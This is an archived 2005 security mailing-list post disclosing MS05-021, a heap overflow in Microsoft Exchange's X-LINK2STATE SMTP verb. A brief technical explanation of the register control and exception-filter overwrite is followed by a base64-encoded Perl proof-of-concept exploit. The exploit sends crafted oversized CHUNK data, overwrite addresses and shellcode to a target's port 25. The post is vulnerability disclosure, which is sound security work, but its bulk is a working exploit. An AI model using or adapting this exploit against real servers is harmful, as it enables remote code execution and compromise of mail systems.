[38445] in bugtraq
MS05-021 Microsoft Exchange X-LINK2STATE Heap Overflow PoC
daemon@ATHENA.MIT.EDU (Evgeny Pinchuk)
Tue Apr 19 15:37:38 2005
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----_=_NextPart_001_01C54507.F4C0A762"
Date: Tue, 19 Apr 2005 19:46:49 +0200
Message-ID: <036997811EB7544FA56BA63A1B699B8B1A9081@APOLLO.il.corp.radware.com>
From: "Evgeny Pinchuk" <EvgenyP@Radware.com>
To: <vuln-dev@securityfocus.com>, <bugtraq@securityfocus.com>,
<full-disclosure@lists.grok.org.uk>, <appsec-research@linuxbox.org>
This is a multi-part message in MIME format.
------_=_NextPart_001_01C54507.F4C0A762
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Vulnerability Details
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The vulnerability is a heap overflow in SvrAppendReceivedChunk function
which is located in xlsasink.dll.
When transmitting large chunks with X-LINK2STATE verb it is possible to
overflow the heap and perform arbitrary memory write in RtlAllocateHeap
function.
77fcc663 8901 mov [ecx],eax =20
77fcc665 894804 mov [eax+0x4],ecx =20
We are controlling ECX and EAX registers. So rewriting
lpTopLevelExceptionFilter can easily get us to our shellcode on the
heap.
Regards,
Evgeny Pinchuk=20
------_=_NextPart_001_01C54507.F4C0A762
Content-Type: application/octet-stream;
name="MS05-021-PoC.pl"
Content-Transfer-Encoding: base64
Content-Description: MS05-021-PoC.pl
Content-Disposition: attachment;
filename="MS05-021-PoC.pl"
IyEvYmluL3BlcmwNCiMNCiMNCiMgTVMwNS0wMjEgRXhjaGFuZ2UgWC1MSU5LMlNUQVRFIEhlYXAg
T3ZlcmZsb3cNCiMgQXV0aG9yOiBFdmdlbnkgUGluY2h1aw0KIyBGb3IgZWR1Y2F0aW9uYWwgcHVy
cG9zZXMgb25seS4NCiMgDQojIFRlc3RlZCBvbjoNCiMgV2luZG93cyAyMDAwIFNlcnZlciBTUDQg
RU4NCiMgTWljcm9zb2Z0IEV4Y2hhbmdlIDIwMDAgU1AzDQojIA0KIyBUaGFua3MgYW5kIGdyZWV0
czogDQojIEhhbHZhciBGbGFrZSAodGh4IGZvciB0aGUgcmlnaHQgZGlyZWN0aW9ucykNCiMgQWxl
eCBCZWhhciwgWXVyaSBHdXNoaW4sIElzaGF5IFNvbW1lciwgWml2IEdhZG90IGFuZCBEYXZlIEhh
d2tpbnMNCiMgDQojDQoNCnVzZSBJTzo6U29ja2V0OjpJTkVUOw0KDQpteSAkaG9zdCA9IHNoaWZ0
KEBBUkdWKTsNCm15ICRwb3J0ID0gMjU7DQpteSAkcmVwbHk7DQpteSAkcmVxdWVzdDsNCm15ICRF
QVg9Ilx4NTVceEIyXHhEM1x4NzciOwkjIENBTEwgRFdPUkQgUFRSIFtFU0krMHg0Q10gKHJwY3J0
NC5kbGwpICAJDQpteSAkRUNYPSJceEYwXHhBMVx4NUNceDdDIjsJIyBscFRvcExldmVsRXhjZXB0
aW9uRmlsdGVyDQpteSAkSk1QPSJceEVCXHgxMCI7DQoNCg0KbXkgJFNDPSJceDMxXHhjMFx4MzFc
eGRiXHgzMVx4YzlceDMxXHhkMlx4ZWJceDM3XHg1OVx4ODhceDUxXHgwYVx4YmJceEQ1XHgwMSIg
Lg0KIlx4NTlceDdDXHg1MVx4ZmZceGQzXHhlYlx4MzlceDU5XHgzMVx4ZDJceDg4XHg1MVx4MGJc
eDUxXHg1MFx4YmJceDVGIiAuDQoiXHgwQ1x4NTlceDdDXHhmZlx4ZDNceGViXHgzOVx4NTlceDMx
XHhkMlx4ODhceDUxXHgwRFx4MzFceGQyXHg1Mlx4NTEiIC4NCiJceDUxXHg1Mlx4ZmZceGQwXHgz
MVx4ZDJceDUwXHhiOFx4NzJceDY5XHg1OVx4N0NceGZmXHhkMFx4ZThceGM0XHhmZiIgLg0KIlx4
ZmZceGZmXHg3NVx4NzNceDY1XHg3Mlx4MzNceDMyXHgyZVx4NjRceDZjXHg2Y1x4NGVceGU4XHhj
Mlx4ZmZceGZmIiAuDQoiXHhmZlx4NGRceDY1XHg3M1x4NzNceDYxXHg2N1x4NjVceDQyXHg2Zlx4
NzhceDQxXHg0ZVx4ZThceGMyXHhmZlx4ZmYiIC4NCiJceGZmXHg0RFx4NTNceDMwXHgzNVx4MkRc
eDMwXHgzMlx4MzFceDIwXHg1NFx4NjVceDczXHg3NFx4NGUiOw0KDQpteSAkY21kPSJYLUxJTksy
U1RBVEUgQ0hVTks9IjsNCg0KbXkgJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldyhwcm90
bz0+J3RjcCcsIFBlZXJBZGRyPT4kaG9zdCwgUGVlclBvcnQ9PiRwb3J0KTsNCiRzb2NrZXQgb3Ig
ZGllICJDYW5ub3QgY29ubmVjdCB0byBob3N0IVxuIjsNCg0KcmVjdigkc29ja2V0LCAkcmVwbHks
IDEwMjQsIDApOw0KcHJpbnQgIlJlc3BvbnNlOiIgLiAkcmVwbHk7DQokcmVxdWVzdCA9ICJFSExP
XHJcbiI7DQpzZW5kICRzb2NrZXQsICRyZXF1ZXN0LCAwOw0KcHJpbnQgIlsrXSBTZW50IEVITE9c
biI7DQpyZWN2KCRzb2NrZXQsICRyZXBseSwgMTAyNCwgMCk7DQpwcmludCAiUmVzcG9uc2U6IiAu
ICRyZXBseTsNCiRyZXF1ZXN0ID0gJGNtZCAuICJBIngxMDAwIC4gIlxyXG4iOw0Kc2VuZCAkc29j
a2V0LCAkcmVxdWVzdCwgMDsNCnByaW50ICJbK10gU2VudCAxc3QgY2h1bmtcbiI7DQpyZWN2KCRz
b2NrZXQsICRyZXBseSwgMTAyNCwgMCk7DQpwcmludCAiUmVzcG9uc2U6IiAuICRyZXBseTsNCiRy
ZXF1ZXN0ID0gIkEieDMwIC4gJEpNUCAuICRFQVggLiAkRUNYIC4gIkIieDEwMCAuICRTQzsNCm15
ICRsZWZ0PTEwMDAtbGVuZ3RoKCRyZXF1ZXN0KTsNCiRyZXF1ZXN0ID0gJHJlcXVlc3QgLiAiQyJ4
JGxlZnQ7DQokcmVxdWVzdCA9ICRjbWQgLiAkcmVxdWVzdCAuICJcclxuIjsNCnNlbmQgJHNvY2tl
dCwgJHJlcXVlc3QsIDA7DQpwcmludCAiWytdIFNlbnQgMm5kIGNodW5rXG4iOw0KcmVjdigkc29j
a2V0LCAkcmVwbHksIDEwMjQsIDApOw0KcHJpbnQgIlJlc3BvbnNlOiIgLiAkcmVwbHk7DQpjbG9z
ZSAkc29ja2V0Ow0KJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldyhwcm90bz0+J3RjcCcs
IFBlZXJBZGRyPT4kaG9zdCwgUGVlclBvcnQ9PiRwb3J0KTsNCiRzb2NrZXQgb3IgZGllICJDYW5u
b3QgY29ubmVjdCB0byBob3N0IVxuIjsNCnJlY3YoJHNvY2tldCwgJHJlcGx5LCAxMDI0LCAwKTsN
CnByaW50ICJSZXNwb25zZToiIC4gJHJlcGx5Ow0KJHJlcXVlc3QgPSAiRUhMT1xyXG4iOw0Kc2Vu
ZCAkc29ja2V0LCAkcmVxdWVzdCwgMDsNCnByaW50ICJbK10gU2VudCBFSExPXG4iOw0KcmVjdigk
c29ja2V0LCAkcmVwbHksIDEwMjQsIDApOw0KcHJpbnQgIlJlc3BvbnNlOiIgLiAkcmVwbHk7DQok
cmVxdWVzdCA9ICRjbWQgLiAiQSJ4MTAwMCAuICJcclxuIjsNCnNlbmQgJHNvY2tldCwgJHJlcXVl
c3QsIDA7DQpwcmludCAiWytdIFNlbnQgM3JkIGNodW5rXG4iOw0KDQpjbG9zZSAkc29ja2V0Ow0K
DQo=
------_=_NextPart_001_01C54507.F4C0A762--
